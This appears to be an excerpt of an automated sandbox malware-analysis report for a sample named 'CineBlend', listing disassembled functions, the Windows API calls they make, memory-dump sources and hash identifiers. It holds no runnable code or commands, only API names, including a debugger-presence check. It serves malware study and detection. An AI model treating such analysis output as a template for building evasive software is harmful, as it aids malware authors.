APIs

IsThemeActive.UXTHEME ref: 00B3333D

Part of subcall function 00B332E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B332FB
Part of subcall function 00B332E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B33312

Part of subcall function 00B3338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00B33368,?), ref: 00B333BB
Part of subcall function 00B3338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00B33368,?), ref: 00B333CE
Part of subcall function 00B3338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C02418,00C02400,?,?,?,?,?,?,00B33368,?), ref: 00B3343A
Part of subcall function 00B3338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00C02418,?,?,?,?,?,?,?,00B33368,?), ref: 00B334BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00B33377

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 6c121f8c1d3797f6e7dd197deab2ca17bf8b09cdb0ff26f091acf830c3684cc7
Instruction ID: 2f18391f497653467e08bcd59dead50be4bbe93a94383628426e9a209fe8f213
Opcode Fuzzy Hash: 6c121f8c1d3797f6e7dd197deab2ca17bf8b09cdb0ff26f091acf830c3684cc7
Instruction Fuzzy Hash: C5F0E2315583449FD3016F70EC0FB3D37D8A704B0AF11489AB6098A1F2CFBA9154CB04

Function 00BA0B4C Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Part of subcall function 00BA1312: InterlockedExchange.KERNEL32(?,?), ref: 00BA1322
Part of subcall function 00BA1312: EnterCriticalSection.KERNEL32(00000000,?), ref: 00BA1334
Part of subcall function 00BA1312: TerminateThread.KERNEL32(00000000,000001F6), ref: 00BA1342
Part of subcall function 00BA1312: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00BA1350
Part of subcall function 00BA1312: CloseHandle.KERNEL32(00000000), ref: 00BA135F
Part of subcall function 00BA1312: InterlockedExchange.KERNEL32(?,000001F6), ref: 00BA136F
Part of subcall function 00BA1312: LeaveCriticalSection.KERNEL32(00000000), ref: 00BA1376

CloseHandle.KERNELBASE(?,?,00BA0BBF), ref: 00BA0B5D
DeleteCriticalSection.KERNEL32(?,?,00BA0BBF), ref: 00BA0B83

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CriticalSection$CloseExchangeHandleInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 2929296749-0
Opcode ID: 137af64304be65f06ac995cb4ec445284d0ad446695f551b06fe4397e90d1343
Instruction ID: 29e3f288ebe9c5adf015e65230e549be46ab8ecb9091c76d3289273fa54dc132
Opcode Fuzzy Hash: 137af64304be65f06ac995cb4ec445284d0ad446695f551b06fe4397e90d1343
Instruction Fuzzy Hash: 3FE04872024601DBCB703F55E805B45BBE4FF08311F2088AEF49656831CF7058C5CB09

Function 00B3CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00B3CEEE

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: d4f499338072fc5728ba7899c32b515e4d6ff5fa9d64098a5f7e0c0fdaf0b0cb
Instruction ID: 6308eb05ca1dc68c13e23e307c31c3171092a00fd348fa8fffa5ac87e62a543b
Opcode Fuzzy Hash: d4f499338072fc5728ba7899c32b515e4d6ff5fa9d64098a5f7e0c0fdaf0b0cb
Instruction Fuzzy Hash: 6932A074A002459FCB14DF98C884BBEBBF9EF44350F2584E9E916AB261D734ED46CB90

Function 00BB7AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 0163ca95275ddb021e6fe8ae576329b859d47a6290a9bc25718ae70d29d6e6b5
Instruction ID: 8362961777952f47167bc2cd9ffa2645609e430e907d49d7cf32b4c8b527c043
Opcode Fuzzy Hash: 0163ca95275ddb021e6fe8ae576329b859d47a6290a9bc25718ae70d29d6e6b5
Instruction Fuzzy Hash: 46D11875A04209AFCB14EF98C8919FDBBF5FF48310F6441A9E915AB291DB70AE41CB90

Function 00B5F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 132099ef6a3cc010c68994f639c8762f6783fc546d0e828be27b282b3710d15b
Instruction ID: a48deaf3ab9a07be49cb71fc924431d1d960cbfcd7c98ddec5c3c819ac8303ac
Opcode Fuzzy Hash: 132099ef6a3cc010c68994f639c8762f6783fc546d0e828be27b282b3710d15b
Instruction Fuzzy Hash: FF51C675A00109AFDB10DF68C845BB9BBE2EB85365F1981E8FC189B391D732ED46CB50

Function 00B36679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B3668B,?,?,00B362FA,?,00000001,?,?,00000000), ref: 00B3664A
Part of subcall function 00B3663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B3665C
Part of subcall function 00B3663E: FreeLibrary.KERNEL32(00000000,?,?,00B3668B,?,?,00B362FA,?,00000001,?,?,00000000), ref: 00B3666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00B362FA,?,00000001,?,?,00000000), ref: 00B366AB

Part of subcall function 00B36607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B75657,?,?,00B362FA,?,00000001,?,?,00000000), ref: 00B36610
Part of subcall function 00B36607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B36622
Part of subcall function 00B36607: FreeLibrary.KERNEL32(00000000,?,?,00B75657,?,?,00B362FA,?,00000001,?,?,00000000), ref: 00B36635

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 30d1e53c3c482725eeea08395cd73204aa20bd75bc10afb682926f8158f5d3d8
Instruction ID: d5859999261bc542b0aca5e293e0cd9b3da99b0b139540bcc1a00c4702f190a1
Opcode Fuzzy Hash: 30d1e53c3c482725eeea08395cd73204aa20bd75bc10afb682926f8158f5d3d8
Instruction Fuzzy Hash: 5D112731600205BACF14AF24C907BEDBBE19F40740F30C4AEF452AA0C2DEB1DA05DB50

Function 00B68782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00B687C0

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: c915fd43a7330434cca03a9c7fe9dcb22573d38e3800ec3b763071f05b673618
Instruction ID: 4d76f3a978110a826aa8f8fd8bd3dd79a094238bf7094bf064f4e834bff4eacc
Opcode Fuzzy Hash: c915fd43a7330434cca03a9c7fe9dcb22573d38e3800ec3b763071f05b673618
Instruction Fuzzy Hash: 971118B590420AAFCB15DF58E945A9E7BF4EF48310F1141A9F809AB311DA31EE11CB65

Function 00B65373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B64FF0: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B6319C,00000001,00000364,?,00B50165,?,?,00BA11D9,0000FFFF), ref: 00B65031

_free.LIBCMT ref: 00B653DF

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction ID: 565144df8b651ccc63d41138d26cf461613b068df69565ab9366b20fb89e15b9
Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction Fuzzy Hash: 2901F9B22007056BE3318F69D881D5AFBEDEB85370F65066DE58583280EB74A905C774

Function 00B5E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
Instruction ID: 89ffb47122193051af58e139c8688d5285af730222ff695e1618d3dda57fa04a
Opcode Fuzzy Hash: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
Instruction Fuzzy Hash: 4DF02832500A2056E7353A2A9C05B6A33D9CF42336F1007E6FD35D31D1EF78E90A86D2

Function 00B3B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B3B333

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 1831a77acc44a817faade0bdcf989f396385b6f450ca47fc9b345e170315b160
Instruction ID: 1099aa847c9f8099e88b75a353ffaf1f66c0043dac137bfa95905d486aef8162
Opcode Fuzzy Hash: 1831a77acc44a817faade0bdcf989f396385b6f450ca47fc9b345e170315b160
Instruction Fuzzy Hash: DEF0C8B3601B146ED714AF28D806F66BBD8EB44360F1085AAFB19CB1D1DB71E5148BA4

Function 00B64FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B6319C,00000001,00000364,?,00B50165,?,?,00BA11D9,0000FFFF), ref: 00B65031

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d8fdc96e128516ac133ce59f464c360ba36c867edd6c855e0348cb0fc2c834ff
Instruction ID: 2ea18bd9deeb32b6d2962aab5eed841944c30c1e42f71f89fdb9f882fa8ae95b
Opcode Fuzzy Hash: d8fdc96e128516ac133ce59f464c360ba36c867edd6c855e0348cb0fc2c834ff
Instruction Fuzzy Hash: 8EF0E236610E25A7DB312E66DC05F5A77C8FF407E1F1980E1FC08AB0A0DA38D82586F0

Function 00B63B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00B50165,?,?,00BA11D9,0000FFFF), ref: 00B63BC5

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c9fb2083e8ddce2a258bad70e62d8a9e7e0ccf3c1f07554becf9a3913be33abb
Instruction ID: 958965541ca590ae54c4afd586c7aa49a429ccb057c7aa6339063b2742887e0b
Opcode Fuzzy Hash: c9fb2083e8ddce2a258bad70e62d8a9e7e0ccf3c1f07554becf9a3913be33abb
Instruction Fuzzy Hash: 20E06D21642A21A6DA313B769C45B5A7ACCEF41BA1F1D01E1EC06A65A1DF68CE4086A0

Function 00B366E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1692df989f8936be01fadfb1759d9efcd881b820d52a0864d0fb2a2fd94525b0
Instruction ID: 8c2aa65fc463bcd5a1e77019d3d80e7dc6cb2585bf00223003182c91e39d4aa0
Opcode Fuzzy Hash: 1692df989f8936be01fadfb1759d9efcd881b820d52a0864d0fb2a2fd94525b0
Instruction Fuzzy Hash: B4F01571505702DFCB349F64D8A0856BBE4EF1432A364C9BEE5EA86610C7719844DF10

Function 00B3684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00B36868

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: 6bf6995ca4e4d19055e586333366edde1dc354bfbbe788fe892ee5b535113f30
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: 0DF0F87550020DFFDF09DF90C941E9E7BB9FB08318F208485F9159A151C376EA21ABA1

Function 00B33907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00B33963

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: ac5ca028ee09e6e2161aea5eeb642c411c52809f429164c21060618cb39dc513
Instruction ID: c071bcff1b8b59d37bd306e475a84e86b4c5204455a033ed3ad352380b21f45c
Opcode Fuzzy Hash: ac5ca028ee09e6e2161aea5eeb642c411c52809f429164c21060618cb39dc513
Instruction Fuzzy Hash: ADF030709143189FEB529F64DC4EB9A7BFCA705708F0041E9A688A7292DB745B88CF91

Function 00B33A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B33A76

Part of subcall function 00B38577: _wcslen.LIBCMT ref: 00B3858A

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 4b8e9fab93ed61f6b42da5936eecafa648cf95eb05de5bf3f4d8abb5cd9bb906
Instruction ID: 38fd31a375a136aae663b406f61ca14f20e2db0e14e6decb76c669f9d9689069
Opcode Fuzzy Hash: 4b8e9fab93ed61f6b42da5936eecafa648cf95eb05de5bf3f4d8abb5cd9bb906
Instruction Fuzzy Hash: C0E0C276A002245BCB20A758DC06FEA77EDDFC87A0F0540B1FC09D7258DD60ED809690

Function 00B9E83E Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00B9E857

Part of subcall function 00B38577: _wcslen.LIBCMT ref: 00B3858A

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: FolderPath_wcslen
String ID:
API String ID: 2987691875-0
Opcode ID: 537162d462c0e6b03a29d621db3ec760ff0cdd721a21758e0d227aa111ce124f
Instruction ID: 58f94f57604d990a6c4b53f6ecb09cb32f43d591fee8060cafc3b224623f62f8
Opcode Fuzzy Hash: 537162d462c0e6b03a29d621db3ec760ff0cdd721a21758e0d227aa111ce124f
Instruction Fuzzy Hash: 5CD05EA59003282BDF64A6749C0DDBB3AACCB84210F0006A078ADD3152ED30EE4486A0

Function 00BA12EB Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_000712D1,00000000,00000000,?), ref: 00BA1306

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: e356365e79134ab1b5105d73fb9ce8bd34f3ada55dd324947a0148820cdee2f0
Instruction ID: 6c6ed0aa5903424443bcddab9312d5428c95c2c7874f899681bc77b111bd90ba
Opcode Fuzzy Hash: e356365e79134ab1b5105d73fb9ce8bd34f3ada55dd324947a0148820cdee2f0
Instruction Fuzzy Hash: BED0A7B1426314BF9F6CCB55CD4ACA776ECE906651740157EB402E2940F5F0FD00CAB0

Function 00B7071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00B70A84,?,?,00000000,?,00B70A84,00000000,0000000C), ref: 00B70737

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eed4dd1f3d8a24abfe731e69a0c1df89cc4f0473daf66a115af33e53d4dd4f49
Instruction ID: 61dd562e4d61f3641ed285fd0b4cfa510b462bac9ec9c1428cf3d46c88ce5bfb
